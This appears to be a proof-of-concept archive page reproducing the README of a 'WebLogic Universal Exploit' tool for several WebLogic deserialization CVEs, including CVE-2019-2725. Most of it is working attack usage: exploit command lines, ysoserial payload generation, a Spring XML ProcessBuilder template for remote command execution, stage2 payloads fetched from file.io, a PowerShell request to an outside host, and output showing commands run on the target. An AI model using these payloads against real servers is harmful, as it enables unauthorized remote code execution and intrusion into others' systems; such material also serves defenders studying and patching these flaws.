Associated Vulnerability
Title:Oracle Fusion Middleware WebLogic Server组件访问控制错误漏洞 (CVE-2019-2725)Description:Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 部分版本WebLogic中默认包含的wls9_async_response包,为WebLogicServer提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意HTTP请求,获得目标服务器的权限,在未授权
Description
WebLogic Insecure Deserialization - CVE-2019-2725 payload builder & exploit
Readme
# CVE-2019-2725
WebLogic Universal Exploit - CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 payload builder & exploit
## Info / Help
```
$ python3 weblogic_exploit.py -h
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
usage: weblogic_exploit.py [-h] [-pl PAYLOAD] [-ep ENDPOINT] [-c CMD] [-j]
[-u URL] [-y YSOSERIAL] [-tr TERMINAL] [-px PROXY]
target
positional arguments:
target Target Server
optional arguments:
-h, --help show this help message and exit
-pl PAYLOAD, --payload PAYLOAD Use one of the available payloads: (default: fs_xml_app_ctx)
- process_builder (CMD - all versions)
- unit_of_work_change_set (SERIAL - 10.x versions)
- event_data (CMD - 12.x versions)
- fs_xml_app_ctx (URL - all versions).
-ep ENDPOINT, --endpoint ENDPOINT Use one of the configured endpoints: (default: automatic)
- wls_wsat (CMD output)
- _async (Blind Exec).
-c CMD, --cmd CMD Command to execute. (default: whoami)
-j, --jdk6 Enable CVE-2019-2729 (bypass for 'class'). DISCLAIMER: Works ONLY in JDK 1.6!
-u URL, --url URL Url to fetch stage2. Used with 'URL' payloads. (default: None)
-y YSOSERIAL, --ysoserial YSOSERIAL Custom YSOSERIAL payload file. Used with 'SERIAL' payloads. (default: None)
-tr TERMINAL, --terminal TERMINAL Use one of the available terminals: cmd, bash, powershell, none (default: bash)
-px PROXY, --proxy PROXY Configure a proxy in the format http://127.0.0.1:8080/ (default: None)
This script will generate a valid WebLogic SOAP payload to exploit different CVE's on this web server.
```
## Usage Examples
With the SERIAL payloads, you can pass in a cmd (to dinamically generate a ysoserial payload) or manually generate a ysoserial payload and give it to the script using the -y argument.
To dinamically generate a ysoserial payload you should download the https://github.com/pimps/ysoserial-modified/blob/master/target/ysoserial-modified.jar and place it in the same directory of this script.
The payload unit_of_work_change_set is well know to work only in weblogic 10.x versions. Examples:
```
pimps$ java -jar ysoserial-modified.jar Jdk7u21 bash 'nslookup your.server.com' > ysoserial_payload.bin
pimps$ python3 weblogic_exploit.py -y ysoserial_payload.bin -pl unit_of_work_change_set -px http://127.0.0.1:8080 https://target.server.com
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
[+] YSOSERIAL payload size: 3182
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:
HTTP/1.1 202
Connection: close
Date: Wed, 28 Aug 2019 01:39:52 GMT
Content-Length: 0
pimps$ python3 weblogic_exploit.py -c 'nslookup your.server.com' -pl unit_of_work_change_set -px http://127.0.0.1:8080 https://target.server.com
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
[+] YSOSERIAL payload size: 3027
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:
HTTP/1.1 202
Connection: close
Date: Wed, 28 Aug 2019 01:46:33 GMT
Content-Length: 0
```
With the URL payloads (FileSystemXmlApplicationContext) you can host your own XML and pass it with the argument -u or let the exploit generate an ephemeral payload file for you and host it at https://file.io! This payload will be generated during the exploitation phase and will be deleted once the server fetches it remotely. If you want host your own payload, please use the following template for this:
```
<?xml version="1.0" encoding="utf-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[echo "this is my bash command, change terminal if needed"]]></value>
</list>
</constructor-arg>
</bean>
</beans>
```
This payload is well known to work in all versions of weblogic. The disvantage of this payload is because it needs egress in the target server to fetch a stage2 payload. An example in how to use this payload is described below:
```
$ python weblogic_exploit.py -tr powershell -c 'Invoke-WebRequest http://requestbin.net/r/h4x31337' -pl fs_xml_app_ctx -px http://127.0.0.1:8080 https://target.server.com
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
[-] No stage2 URL provided... Storing it now...
[+] Stage2 payload stored with success at: https://file.io/IbCIbg
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:
HTTP/1.1 202
Connection: close
Date: Tue, 27 Aug 2019 07:42:24 GMT
Content-Length: 0
```
And last but not least, the process_builder payload is the most common exploit payload (metasploit module) that works in weblogic versions not patched to the `class=` blacklist. This payload was customized to print the command output in the response body of the request. Example of usage:
```
pimps$ python3 weblogic_exploit.py -c "id; uname -a" -pl process_builder http://localhost:7001/
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:
HTTP/1.1 200
Connection: close
Date: Thu, 29 Aug 2019 12:30:26 GMT
Transfer-Encoding: chunked
uid=1000(oracle) gid=1000(oracle) groups=1000(oracle)
Linux wlsadmin 4.9.125-linuxkit #1 SMP Fri Sep 7 08:20:28 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
```
## Updates
### 29/08/2019
Added support to the event_data payload with command output in the response body. Example of usage:
```
$ python3 weblogic_exploit.py -c 'id; uname -a' -pl event_data http://localhost:7001
========================================================================
| WebLogic Universal Exploit |
| CVE-2017-3506 / CVE-2017-10271 / CVE-2019-2725 / CVE-2019-2729 |
| by pimps |
========================================================================
[+] Weblogic SOAP payload built with success...
[+] Firing exploit now...
[+] Bomb delivered... Server responded:
HTTP/1.1 200
Connection: close
Date: Thu, 29 Aug 2019 07:37:26 GMT
Transfer-Encoding: chunked
uid=1000(oracle) gid=1000(oracle) groups=1000(oracle)
Linux wlsadmin 4.9.125-linuxkit #1 SMP Fri Sep 7 08:20:28 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
```
Credits: Used part of the payload published in this github to print the command results in the response body (https://github.com/lufeirider/CVE-2019-2725/blob/master/CVE-2019-2725.py). Thanks for share this @lufeirider.
### 26/09/2019
Added support to CVE-2019-2729. Its a bypass to change `<class> </class>` for `<array method="forName"> </array>`. This bypass works only in the JDK 1.6 due a discrepancy in how this JDK version parses XML data via XMLDecoder.
The command argument -j/--jdk6 was added to the exploit script.
File Snapshot
[4.0K] /data/pocs/2e540946dba53eda53d27f2a54f954f891a425f1
├── [8.9K] README.md
└── [ 13K] weblogic_exploit.py
0 directories, 2 files
Remarks
1. It is advised to access via the original source first.
2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.